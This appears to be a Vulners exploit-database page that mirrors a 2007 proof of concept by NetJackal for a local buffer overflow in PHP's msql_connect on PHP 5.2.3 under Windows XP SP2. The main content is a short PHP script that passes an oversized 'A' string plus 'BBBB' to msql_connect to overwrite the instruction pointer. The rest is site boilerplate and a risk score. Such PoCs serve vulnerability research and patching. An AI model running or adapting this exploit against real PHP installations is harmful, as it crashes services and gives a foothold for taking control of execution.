Lucene search
K

PHP mSQL (msql_connect) Local Buffer Overflow PoC

🗓️ 06 Aug 2007 00:00:00Reported by NetJackalType 
zdt
 zdt
🔗 0day.today👁 19 Views

PHP mSQL Local Buffer Overflow PoC, msql_connect function vulnerability on PHP 5.2.3 (XP SP2

Code
=================================================
PHP mSQL (msql_connect) Local Buffer Overflow PoC
=================================================



<?php

##########################################################
###----------------------------------------------------###
###----PHP mSQL (msql_connect) Buffer Overflow PoC-----###
###----------------------------------------------------###
###-Tested on 5.2.3 (XP SP2)---------------------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!function_exists('msql_connect'))
die('mSQL extension is not available');

#msql_pconnect(str_repeat('A',49424).'BBBB');

msql_connect(str_repeat('A',49424).'BBBB'); # EIP => 42424242

?>



#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2007 00:00Current
7.1High risk
Vulners AI Score7.1
19